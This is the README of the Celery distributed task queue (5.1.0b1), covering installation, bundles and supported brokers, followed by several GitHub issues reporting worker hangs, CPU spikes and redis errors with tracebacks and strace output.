Distributed Task Queue (development branch)

Overview

Version: 5.1.0b1 (singularity)
Web: https://docs.celeryproject.org/en/stable/index.html
Download: https://pypi.org/project/celery/
Source: https://github.com/celery/celery/
Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors

Donations

This project relies on your generous donations.

If you are using Celery to create a commercial product, please consider becoming our backer or our sponsor to ensure Celery's future.

For enterprise

Available as part of the Tidelift Subscription.

The maintainers of celery and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. Learn more.

What's a Task Queue?

Task queues are used as a mechanism to distribute work across threads or machines.

A task queue's input is a unit of work called a task. Dedicated worker processes constantly monitor the queue for new work to perform.

Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task, a client puts a message on the queue; the broker then delivers the message to a worker.

A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling.
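
The flow described above can be sketched with the Python standard library alone. This is only an illustration of the idea, not how Celery is implemented: an in-process `queue.Queue` stands in for the broker, threads stand in for worker processes, and the names `run_workers` and `add` are made up for this example.

```python
import queue
import threading


def run_workers(tasks, num_workers=2):
    """Run (func, args) tasks on worker threads and return results in order."""
    work = queue.Queue()      # stands in for the broker's queue (assumption)
    results = {}              # task id -> return value
    lock = threading.Lock()

    def worker():
        while True:
            item = work.get()         # block until a message arrives
            if item is None:          # sentinel: no more work for this worker
                work.task_done()
                break
            task_id, func, args = item
            value = func(*args)
            with lock:
                results[task_id] = value
            work.task_done()

    threads = [threading.Thread(target=worker) for _ in range(num_workers)]
    for t in threads:
        t.start()

    # The "client" side: put one message per task on the queue.
    for task_id, (func, args) in enumerate(tasks):
        work.put((task_id, func, args))
    for _ in threads:
        work.put(None)                # one sentinel per worker

    work.join()
    for t in threads:
        t.join()
    return [results[i] for i in range(len(tasks))]


def add(x, y):
    return x + y


print(run_workers([(add, (1, 2)), (add, (3, 4))]))  # [3, 7]
```

Adding more worker threads here loosely mirrors adding more Celery workers: the client code that enqueues work does not change.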

Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery for Node.js, a PHP client, gocelery for golang, and rusty-celery for Rust.

Language interoperability can also be achieved by using webhooks in such a way that the client enqueues a URL to be requested by a worker.

What do I need?

Celery version 5.1.0b1 runs on:

  • Python (3.6, 3.7, 3.8, 3.9)
  • PyPy3.6 (7.6)

This is the next version of celery which will support Python 3.6 or newer.

If you're running an older version of Python, you need to be running an older version of Celery:

  • Python 2.6: Celery series 3.1 or earlier.
  • Python 2.5: Celery series 3.0 or earlier.
  • Python 2.4: Celery series 2.2 or earlier.
  • Python 2.7: Celery 4.x series.
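
As a quick reference, the compatibility lists above can be written down as a small lookup. This is a hypothetical helper (`celery_series_for` is not part of Celery); it only encodes the versions named in this section and returns `None` for anything the section does not mention.

```python
def celery_series_for(python_version):
    """Map a (major, minor) Python version to the Celery series listed above."""
    version = tuple(python_version)
    # Versions this README lists for Celery 5.1.0b1.
    if (3, 6) <= version <= (3, 9):
        return "5.1.0b1"
    # Older interpreters need an older Celery series.
    legacy = {
        (2, 7): "4.x",
        (2, 6): "3.1 or earlier",
        (2, 5): "3.0 or earlier",
        (2, 4): "2.2 or earlier",
    }
    return legacy.get(version)  # None when the section says nothing


print(celery_series_for((3, 8)))  # 5.1.0b1
print(celery_series_for((2, 7)))  # 4.x
```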

Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform.

Celery is usually used with a message broker to send and receive messages. The RabbitMQ and Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development.

Celery can run on a single machine, on multiple machines, or even across datacenters.

Get Started

If this is the first time you're trying to use Celery, or you're new to Celery 5.0.5 or 5.1.0b1 coming from previous versions then you should read our getting started tutorials:

Celery is...

  • Simple

    Celery is easy to use and maintain, and does not need configuration files.

    It has an active, friendly community you can talk to for support, like at our mailing-list, or the IRC channel.

    Here's one of the simplest applications you can make:

    from celery import Celery
    
    app = Celery('hello', broker='amqp://guest@localhost//')
    
    @app.task
    def hello():
        return 'hello world'
  • Highly Available

    Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA by way of Primary/Primary or Primary/Replica replication.

  • Fast

    A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings).

  • Flexible

    Almost every part of Celery can be extended or used on its own: custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more.
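
To make the "Highly Available" point above more concrete, here is a minimal sketch of retrying an operation after a connection failure, with exponential backoff. It is not Celery's retry code; `call_with_retry`, `flaky_publish`, and their parameters are names invented for this illustration.

```python
import time


def call_with_retry(func, max_retries=3, base_delay=0.1, sleep=time.sleep):
    """Call func(), retrying on ConnectionError with exponential backoff."""
    attempt = 0
    while True:
        try:
            return func()
        except ConnectionError:
            if attempt >= max_retries:
                raise                       # give up after max_retries retries
            sleep(base_delay * (2 ** attempt))
            attempt += 1


# Hypothetical operation that fails twice before succeeding.
calls = {"count": 0}


def flaky_publish():
    calls["count"] += 1
    if calls["count"] < 3:
        raise ConnectionError("broker unreachable")
    return "sent"


print(call_with_retry(flaky_publish, base_delay=0.01))  # sent
```

Passing `sleep` as a parameter keeps the sketch easy to test, since a test can record the delays instead of actually waiting.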

It supports...

  • Message Transports

  • Concurrency

  • Result Stores

    • AMQP, Redis
    • memcached
    • SQLAlchemy, Django ORM
    • Apache Cassandra, IronCache, Elasticsearch
  • Serialization

    • pickle, json, yaml, msgpack.
    • zlib, bzip2 compression.
    • Cryptographic message signing.
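
The three serialization features above (a serializer, a compression scheme, and message signing) can be combined roughly as in the following sketch. It uses only the standard library and is not Celery's wire format: HMAC with a shared key is a stand-in chosen for brevity, not the mechanism behind Celery's auth serializer, and `pack` and `unpack` are hypothetical names.

```python
import hashlib
import hmac
import json
import zlib


def pack(payload, key):
    """Serialize to JSON, compress with zlib, and sign the compressed body."""
    body = zlib.compress(json.dumps(payload, sort_keys=True).encode("utf-8"))
    signature = hmac.new(key, body, hashlib.sha256).hexdigest()
    return body, signature


def unpack(body, signature, key):
    """Verify the signature first, then decompress and deserialize."""
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, signature):
        raise ValueError("bad signature")
    return json.loads(zlib.decompress(body).decode("utf-8"))


key = b"shared-secret"  # illustrative key only
body, signature = pack({"task": "hello", "args": [1, 2]}, key)
print(unpack(body, signature, key))  # {'args': [1, 2], 'task': 'hello'}
```

Checking the signature before decompressing means a tampered message is rejected without ever being parsed.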

Framework Integration

Celery is easy to integrate with web frameworks, some of which even have integration packages:

Framework   Integration package
Django      not needed
Pyramid     pyramid_celery
Pylons      celery-pylons
Flask       not needed
web2py      web2py-celery
Tornado     tornado-celery

The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at fork.

Documentation

The latest documentation is hosted at Read The Docs, containing user guides, tutorials, and an API reference.

The latest Chinese documentation is hosted at https://www.celerycn.io/ and contains user guides, tutorials, and an API reference.

Installation

You can install Celery either via the Python Package Index (PyPI) or from source.

To install using pip:

$ pip install -U Celery

Bundles

Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature.

You can specify these in your requirements or on the pip command-line by using brackets. Multiple bundles can be specified by separating them by commas.

$ pip install "celery[librabbitmq]"

$ pip install "celery[librabbitmq,redis,auth,msgpack]"

The following bundles are available:

Serializers

celery[auth]: for using the auth security serializer.
celery[msgpack]: for using the msgpack serializer.
celery[yaml]: for using the yaml serializer.

Concurrency

celery[eventlet]: for using the eventlet pool.
celery[gevent]: for using the gevent pool.

Transports and Backends

celery[librabbitmq]:

for using the librabbitmq C library.

celery[redis]:

for using Redis as a message transport or as a result backend.

celery[sqs]:

for using Amazon SQS as a message transport.

celery[tblib]:

for using the task_remote_tracebacks feature.

celery[memcache]:

for using Memcached as a result backend (using pylibmc)

celery[pymemcache]:

for using Memcached as a result backend (pure-Python implementation).

celery[cassandra]:

for using Apache Cassandra as a result backend with DataStax driver.

celery[azureblockblob]:

for using Azure Storage as a result backend (using azure-storage)

celery[s3]:

for using S3 Storage as a result backend.

celery[couchbase]:

for using Couchbase as a result backend.

celery[arangodb]:

for using ArangoDB as a result backend.

celery[elasticsearch]:

for using Elasticsearch as a result backend.

celery[riak]:

for using Riak as a result backend.

celery[cosmosdbsql]:

for using Azure Cosmos DB as a result backend (using pydocumentdb)

celery[zookeeper]:

for using Zookeeper as a message transport.

celery[sqlalchemy]:

for using SQLAlchemy as a result backend (supported).

celery[pyro]:

for using the Pyro4 message transport (experimental).

celery[slmq]:

for using the SoftLayer Message Queue transport (experimental).

celery[consul]:

for using the Consul.io Key/Value store as a message transport or result backend (experimental).

celery[django]:

specifies the lowest version possible for Django support.

You should probably not use this in your requirements; it's here for informational purposes only.

Downloading and installing from source

Download the latest version of Celery from PyPI:

https://pypi.org/project/celery/

You can install it by doing the following:

$ tar xvfz celery-0.0.0.tar.gz
$ cd celery-0.0.0
$ python setup.py build
# python setup.py install

The last command must be executed as a privileged user if you aren't currently using a virtualenv.

Using the development version

With pip

The Celery development version also requires the development versions of kombu, amqp, billiard, and vine.

You can install the latest snapshot of these using the following pip commands:

$ pip install https://github.com/celery/celery/zipball/master#egg=celery
$ pip install https://github.com/celery/billiard/zipball/master#egg=billiard
$ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp
$ pip install https://github.com/celery/kombu/zipball/master#egg=kombu
$ pip install https://github.com/celery/vine/zipball/master#egg=vine

With git

Please see the Contributing section.

Getting Help

Mailing list

For discussions about the usage, development, and future of Celery, please join the celery-users mailing list.

IRC

Come chat with us on IRC. The #celery channel is on the Freenode network.

Bug tracker

If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/

Wiki

https://github.com/celery/celery/wiki

Credits

Contributors

This project exists thanks to all the people who contribute. Development of celery happens at GitHub: https://github.com/celery/celery

You're highly encouraged to participate in the development of celery. If you don't like GitHub (for some reason) you're welcome to send regular patches.

Be sure to also read the Contributing to Celery section in the documentation.

Backers

Thank you to all our backers! 🙏 [Become a backer]

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]

License

This software is licensed under the New BSD License. See the LICENSE file in the top distribution directory for the full license text.

Comments
  • Release version 4.3 of Celery

    @thedrow @georgepsarakis It would be great if we could release the beta version of 4.3 by December 1st. Before that, though, we need to release py-amqp, kombu, and other dependencies. This is a soft reminder.

    If you'd like to contribute, here is a list of blockers.

    If you are using Celery to create a commercial product, please consider becoming our backer or our sponsor to ensure Celery's future.

    Category: Project Governance 
    opened by auvipy 102
  • Release version 4.2.0

    I think that it would be a good idea to release a new version that includes all bug fixes so far. @thedrow @auvipy thoughts?

    I can help with the changelog.

    Category: Project Governance 
    opened by georgepsarakis 84
  • Celery Worker 100% CPU usage - task revocation + SIGKILL

    Hello, I noticed that if I revoke tasks and also kill the worker instances with the SIGKILL signal, a celery process consumes 100% CPU on every machine. The situation persists and doesn't change after a while.

    Worker Hangs Component: Prefork Workers Pool Priority: Normal Severity: Normal 
    opened by nachtmaar 70
  • Celery worker using 100% CPU around epoll w/ prefork+redis and not consuming tasks

    Hello,

    We're using Celery 3.1.6, and one of our queues is using 100% CPU for the master process. ps shows:

    root      6960 59.2  0.7 160680 51628 ?        Rs   Feb01 2319:49 /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root     32727  0.3  1.1 266008 82860 ?        S    Feb02   6:29  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root     32729  0.2  1.1 265184 82040 ?        S    Feb02   5:54  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root     32730  0.2  1.4 282868 99788 ?        S    Feb02   5:29  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root       750  0.1  1.5 296584 113100 ?       S    Feb02   3:03  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root       917  0.2  1.1 262044 78888 ?        S    Feb02   6:00  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      1873  0.0  1.2 269460 86276 ?        S    Feb02   1:34  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      1875  0.0  1.4 285568 102384 ?       S    Feb02   0:36  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      2347  0.0  0.8 245448 60984 ?        S    Feb02   1:47  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      2348  0.0  0.8 247760 63356 ?        S    Feb02   1:33  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    root      2362  0.0  1.0 257880 73416 ?        S    Feb02   1:09  \_ /$VENV/bin/python /$VENV/manage.py celery worker -Q ads -P prefork --autoscale=10,5 -n $NAME --settings=settings -l INFO
    

    And strace is more interesting. It shows the following loop as the only thing happening in the parent:

    gettimeofday({1391450996, 406286}, NULL) = 0
    epoll_wait(4, {{EPOLLIN, {u32=6, u64=22205092589469702}}}, 1023, 1000) = 1
    epoll_ctl(4, EPOLL_CTL_DEL, 34, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 67, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 68, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 38, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 10, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 53, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 26, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 59, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 30, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_DEL, 63, {EPOLLRDNORM|EPOLLRDBAND|EPOLLWRNORM|EPOLLMSG|0x4e9020, {u32=0, u64=22205092589469696}}) = -1 ENOENT (No such file or directory)
    epoll_ctl(4, EPOLL_CTL_ADD, 51, {EPOLLIN|EPOLLERR|EPOLLHUP, {u32=51, u64=22205092589469747}}) = -1 EEXIST (File exists)
    epoll_ctl(4, EPOLL_CTL_ADD, 52, {EPOLLIN|EPOLLERR|EPOLLHUP, {u32=52, u64=22205092589469748}}) = -1 EEXIST (File exists)
    epoll_ctl(4, EPOLL_CTL_ADD, 6, {EPOLLIN|EPOLLERR|EPOLLHUP, {u32=6, u64=22205092589469702}}) = -1 EEXIST (File exists)
    

    Those FDs are pipes according to /proc/$PID/fd. (strace also shows heartbeat/worker chatter from other processes read via the redis socket).

    Restarting the upstart job caused the worker to begin consuming tasks again. I think this is some corner case that isn't being handled well. Kombu's eventio.py has the following:

    class _epoll(Poller):
        # ...
        def register(self, fd, events):
            try:
                self._epoll.register(fd, events)
            except Exception as exc:
                if get_errno(exc) != errno.EEXIST:
                    raise
        def unregister(self, fd):
            try:
                self._epoll.unregister(fd)
            except (socket.error, ValueError, KeyError):
                pass
            except (IOError, OSError) as exc:
                if get_errno(exc) != errno.ENOENT:
                    raise
    

    We are specifically checking for ENOENT and EEXIST here and silently dropping the exception - it seems like this might be causing a problem for someone further down the stack, but I'm not familiar with this part of celery.

    Any help/pointers appreciated. Let me know what other info is useful as well.

    Component: Redis Broker Worker Hangs 
    opened by bpowers 68
  • Tasks are not allowed to start subprocesses

    Starting with Celery 3.1.0 the processes pool (celery.concurrency.prefork, former celery.concurrency.processes) uses daemon processes to perform tasks.

    Daemon processes are not allowed to create child processes and, as a result, tasks that use the multiprocessing package do not work:

    [2013-11-29 14:27:48,297: ERROR/MainProcess] Task app.add[e5d184c0-471f-4fc4-804c-f760178d4847] raised exception: AssertionError('daemonic processes are not allowed to have children',)
    Traceback (most recent call last):
      File "/Users/aromanovich/Envs/celery3.1/lib/python2.7/site-packages/celery/app/trace.py", line 218, in trace_task
        R = retval = fun(*args, **kwargs)
      File "/Users/aromanovich/Envs/celery3.1/lib/python2.7/site-packages/celery/app/trace.py", line 398, in __protected_call__
        return self.run(*args, **kwargs)
      File "/Users/aromanovich/Projects/celery/app.py", line 10, in add
        manager = multiprocessing.Manager()
      File "/usr/local/Cellar/python/2.7.6/Frameworks/Python.framework/Versions/2.7/lib/python2.7/multiprocessing/__init__.py", line 99, in Manager
        m.start()
      File "/usr/local/Cellar/python/2.7.6/Frameworks/Python.framework/Versions/2.7/lib/python2.7/multiprocessing/managers.py", line 524, in start
        self._process.start()
      File "/usr/local/Cellar/python/2.7.6/Frameworks/Python.framework/Versions/2.7/lib/python2.7/multiprocessing/process.py", line 124, in start
        'daemonic processes are not allowed to have children'
    
    Status: Not a Bug 
    opened by aromanovich 68
  • AttributeError 'list' object has no attribute 'decode' with redis backend

    Checklist

    • [X] I have included the output of celery -A proj report in the issue.
    software -> celery:4.1.0 (latentcall) kombu:4.1.0 py:3.5.2
                billiard:3.5.0.3 redis:2.10.5
    platform -> system:Linux arch:64bit, ELF imp:CPython
    loader   -> celery.loaders.app.AppLoader
    settings -> transport:redis results:redis://:**@****************
    
    task_ignore_result: True
    accept_content: {'pickle'}
    result_serializer: 'pickle'
    result_backend: 'redis://:********@************************'
    task_serializer: 'pickle'
    task_send_sent_event: True
    broker_url: 'redis://:********@************************'
    

    redis-server version, both 2.x and 3.x

    Steps to reproduce

    Hello, I'm not sure what can cause the problem. I already tried to find a similar report with a solution, but no luck so far. Therefore I'm opening an issue here; hopefully it helps.

    The issue is described there as well (not by me): https://github.com/andymccurdy/redis-py/issues/612

    So far, in my experience, it happens in both cases, whether or not the backend is involved (that is, even when just calling apply_async(...)).

    Exception when calling apply_async(): [screenshot]

    Exception when calling .get() (this one has int instead of list): [screenshot]

    Hope it helps

    Expected behavior

    To not throw the error.

    Actual behavior

    AttributeError: 'list' object has no attribute 'decode'

    Thanks!

    Issue Type: Bug Report Component: Redis Results Backend upstream bug 
    opened by Twista 60
  • Needs more maintainers

    Celery isn't advancing as fast as it should. We need more maintainers to merge and review pull requests, answer issues and push this awesome project forwards. Right now @ask acts as the only maintainer for this project, and he's only one person who can contribute only so many commits. What do you guys think about recruiting maintainers on a quarterly basis like Django REST Framework does?

    Category: Project Governance 
    opened by thedrow 60
  • Celery Worker crashing after first task with TypeError: 'NoneType' object is not callable

    Checklist

    • [X] I have included the output of celery -A proj report in the issue. (if you are not able to do this, then at least specify the Celery version affected).
    software -> celery:4.0.0 (latentcall) kombu:4.0.0 py:3.4.3
                billiard:3.5.0.2 py-amqp:2.1.1
    platform -> system:Linux arch:64bit, ELF imp:CPython
    loader   -> celery.loaders.default.Loader
    settings -> transport:amqp results:disabled
    
    • [X] I have verified that the issue exists against the master branch of Celery. Yes I've tested and it behaves the same using master.

    Steps to reproduce

    Not exactly sure, because other machines with the same specs and requirements are working.

    Expected behavior

    Should consume tasks.

    Actual behavior

    A task is accepted, then a traceback is logged, then the worker reconnects to the broker for some reason. This repeats forever:

    [2016-11-23 23:09:00,468: INFO/MainProcess] Connected to amqp://user:**@10.136.131.6:5672//
    [2016-11-23 23:09:00,484: INFO/MainProcess] mingle: searching for neighbors
    [2016-11-23 23:09:01,921: INFO/MainProcess] mingle: sync with 1 nodes
    [2016-11-23 23:09:01,922: INFO/MainProcess] mingle: sync complete
    [2016-11-23 23:09:01,970: INFO/MainProcess] Received task: tasks.calculate_user_running_total[ddd103af-d527-4564-83f8-96b747767a0c]
    [2016-11-23 23:09:01,972: CRITICAL/MainProcess] Unrecoverable error: TypeError("'NoneType' object is not callable",)
    Traceback (most recent call last):
      File "./venv/lib/python3.4/site-packages/celery/worker/worker.py", line 203, in start
        self.blueprint.start(self)
      File "./venv/lib/python3.4/site-packages/celery/bootsteps.py", line 119, in start
        step.start(parent)
      File "./venv/lib/python3.4/site-packages/celery/bootsteps.py", line 370, in start
        return self.obj.start()
      File "./venv/lib/python3.4/site-packages/celery/worker/consumer/consumer.py", line 318, in start
        blueprint.start(self)
      File "./venv/lib/python3.4/site-packages/celery/bootsteps.py", line 119, in start
        step.start(parent)
      File "./venv/lib/python3.4/site-packages/celery/worker/consumer/consumer.py", line 584, in start
        c.loop(*c.loop_args())
      File "./venv/lib/python3.4/site-packages/celery/worker/loops.py", line 47, in asynloop
        consumer.consume()
      File "./venv/lib/python3.4/site-packages/kombu/messaging.py", line 470, in consume
        self._basic_consume(T, no_ack=no_ack, nowait=False)
      File "./venv/lib/python3.4/site-packages/kombu/messaging.py", line 591, in _basic_consume
        no_ack=no_ack, nowait=nowait)
      File "./venv/lib/python3.4/site-packages/kombu/entity.py", line 737, in consume
        arguments=self.consumer_arguments)
      File "./venv/lib/python3.4/site-packages/amqp/channel.py", line 1578, in basic_consume
        wait=None if nowait else spec.Basic.ConsumeOk,
      File "./venv/lib/python3.4/site-packages/amqp/abstract_channel.py", line 73, in send_method
        return self.wait(wait, returns_tuple=returns_tuple)
      File "./venv/lib/python3.4/site-packages/amqp/abstract_channel.py", line 93, in wait
        self.connection.drain_events(timeout=timeout)
      File "./venv/lib/python3.4/site-packages/amqp/connection.py", line 464, in drain_events
        return self.blocking_read(timeout)
      File "./venv/lib/python3.4/site-packages/amqp/connection.py", line 469, in blocking_read
        return self.on_inbound_frame(frame)
      File "./venv/lib/python3.4/site-packages/amqp/method_framing.py", line 88, in on_frame
        callback(channel, msg.frame_method, msg.frame_args, msg)
      File "./venv/lib/python3.4/site-packages/amqp/connection.py", line 473, in on_inbound_method
        method_sig, payload, content,
      File "./venv/lib/python3.4/site-packages/amqp/abstract_channel.py", line 142, in dispatch_method
        listener(*args)
      File "./venv/lib/python3.4/site-packages/amqp/channel.py", line 1613, in _on_basic_deliver
        fun(msg)
      File "./venv/lib/python3.4/site-packages/kombu/messaging.py", line 617, in _receive_callback
        return on_m(message) if on_m else self.receive(decoded, message)
      File "./venv/lib/python3.4/site-packages/celery/worker/consumer/consumer.py", line 558, in on_task_received
        callbacks,
      File "./venv/lib/python3.4/site-packages/celery/worker/strategy.py", line 145, in task_message_handler
        handle(req)
      File "./venv/lib/python3.4/site-packages/celery/worker/worker.py", line 221, in _process_task_sem
        return self._quick_acquire(self._process_task, req)
      File "./venv/lib/python3.4/site-packages/kombu/async/semaphore.py", line 62, in acquire
        callback(*partial_args, **partial_kwargs)
      File "./venv/lib/python3.4/site-packages/celery/worker/worker.py", line 226, in _process_task
        req.execute_using_pool(self.pool)
      File "./venv/lib/python3.4/site-packages/celery/worker/request.py", line 532, in execute_using_pool
        correlation_id=task_id,
      File "./venv/lib/python3.4/site-packages/celery/concurrency/base.py", line 155, in apply_async
        **options)
      File "./venv/lib/python3.4/site-packages/billiard/pool.py", line 1487, in apply_async
        self._quick_put((TASK, (result._job, None, func, args, kwds)))
    TypeError: 'NoneType' object is not callable
    

    The above lines keep repeating every few seconds and no tasks are consumed from the queue.

    opened by alanhamlett 54
  • Proposal to deprecate Redis as a broker support. [Rejected]

    If we removed support for Redis, we'd be able to focus the time on RabbitMQ, or maybe Kafka/nsq. There's also the huge task of porting to asyncio in Python 3.

    I think this should be seriously considered. If we are to work on this for fun, then the popularity of the transport shouldn't matter.

    In the end I will choose what I have the ability to work on anyway, but at least you can voice your concerns here.

    Category: Project Governance 
    opened by ask 54
  • Feature: Dynamic tasks

    So I submit to you dynamic tasks, and dynamic chords. This is a really powerful concept, and I think it changes the game.

    Subtasks returned by dynamic tasks are executed right after the first task executes. As if they were in a chain. You can also return chains and chords, and they will be properly inserted.

    This allows you to design a pipeline that can be completely dynamic, while benefiting from Celery's powerful idioms (subtasks, chains, chords...).

    Our whole backend at @veezio is powered by these. They allow us to have extensively dynamic pipelines. We have pipes inside chords, chords inside chords, tasks put before pipes, etc.

    To be honest, I can't think of something you can't do with this.

    How to use:

    import celery.contrib.dynamic
    
    @celery.dynamic_task
    def test(number):
        # Return the signature of the subtask that should run next.
        if number > 5:
            return more.s()
        return less.s()
    
    
    @celery.dynamic_task
    def more():
        print("it's more !")
    
    @celery.dynamic_task
    def less():
        print("it's less !")
    

    But you can do cool shit too!

    @celery.dynamic_task
    def one(n):
        if n:
            return three.si(n + 4) | four.s() # if you don't use an immutable task, the result of one (a subtask) will be sent to three.
        return n
    pipe = one.s(1) | two.s()
    
    pipe.apply_async() # will run: one(1) | three(1+4) | four | two
    

    You can also use them in chords! And have chords in chords!:

    from celery.contrib.dynamic import dynamic_chord as chord
    
    @celery.dynamic_task
    def resolve_url(url):
        # do some stuff, and parallelize all that
        return chord(map(do_stuff.si, data), on_finished.s())
    
    resolve_urls = chord(map(resolve_url.si, urls), url_resolved.s())
    

    In that case url_resolved will be called with the results from on_finished(), which is:

    [ [..., ], [..., ] ]
    
    opened by steeve 54
  • Worker hangs and stop responding after an undeterminated amount of time (sometimes).

    This is an ongoing investigation. I'm putting here what I can see so far.

    I have seen this problem since 4.0.2, and now I've just spotted it in 4.1.0. These are the versions of the packages I'm using:

    kombu = 4.1.0
    celery = 4.1.0
    amqp = 2.2.1
    billiard = 3.5.0.3
    redis = 2.10.6
    

    The problem seems to happen with a worker started with -c 1 and worker_max_tasks_per_child=2000. This worker also processes tasks from a single queue, 'odoo-8.0.cdr'. Just after the 2000th task it hangs. Strangely, the issue does not happen every time the worker reaches this threshold, but when it does happen, it happens at that point.

    screenshot from 2017-10-10 12-02-08

    This is a production server so I can't really test with master branch. I'll try to reproduce on a development box later.

    stracing the Worker yields:

    root@mercurio:~# strace -p 9105
    Process 9105 attached
    recvfrom(27, 
    

    I waited for 5+ minutes and it didn't receive anything. The file descriptors:

    [celeryd: 9105 mercurio   13u  sock       0,6      0t0 273693676 can't identify protocol
    [celeryd: 9105 mercurio   14u  sock       0,6      0t0 273693673 can't identify protocol
    [celeryd: 9105 mercurio   15u  0000       0,9        0      4047 [eventpoll]
    [celeryd: 9105 mercurio   16u  sock       0,6      0t0 273693679 can't identify protocol
    [celeryd: 9105 mercurio   17u  0000       0,9        0      4047 [eventpoll]
    [celeryd: 9105 mercurio   18u  0000       0,9        0      4047 [eventpoll]
    [celeryd: 9105 mercurio   19u  sock       0,6      0t0 273693682 can't identify protocol
    [celeryd: 9105 mercurio   20u  sock       0,6      0t0 273693685 can't identify protocol
    [celeryd: 9105 mercurio   21u  sock       0,6      0t0 273693942 can't identify protocol
    [celeryd: 9105 mercurio   22u  sock       0,6      0t0 273693945 can't identify protocol
    [celeryd: 9105 mercurio   23u  sock       0,6      0t0 273693948 can't identify protocol
    [celeryd: 9105 mercurio   24u  sock       0,6      0t0 273693951 can't identify protocol
    [celeryd: 9105 mercurio   25u  IPv4 288763673      0t0       TCP localhost.localdomain:56030->localhost.localdomain:6379 (ESTABLISHED)
    [celeryd: 9105 mercurio   26r  FIFO       0,8      0t0 288763672 pipe
    [celeryd: 9105 mercurio   27u  IPv4 288763676      0t0       TCP localhost.localdomain:56031->localhost.localdomain:6379 (ESTABLISHED)
    

    These show that 27 is the redis connection, but there are several fds for which lsof can't identify the protocol. Half-closed connections?

    The ForkPoolWorker strace shows:

    root@mercurio:~# strace -p 23943
    Process 23943 attached
    read(7, 
    

    I also waited for 5+ minutes here to see if anything happened. Nothing. lsof shows:

    [celeryd: 23943 mercurio    6r   CHR    1,9      0t0     18535 /dev/urandom
    [celeryd: 23943 mercurio    7r  FIFO    0,8      0t0 273693670 pipe
    [celeryd: 23943 mercurio   10r   CHR    1,9      0t0     18535 /dev/urandom
    [celeryd: 23943 mercurio   11w  FIFO    0,8      0t0 273693671 pipe
    [celeryd: 23943 mercurio   12r   CHR    1,3      0t0     18531 /dev/null
    [celeryd: 23943 mercurio   15u  0000    0,9        0      4047 [eventpoll]
    [celeryd: 23943 mercurio   17u  0000    0,9        0      4047 [eventpoll]
    [celeryd: 23943 mercurio   26w  FIFO    0,8      0t0 288763672 pipe
    

    So 7 is a FIFO pipe (I don't know which).

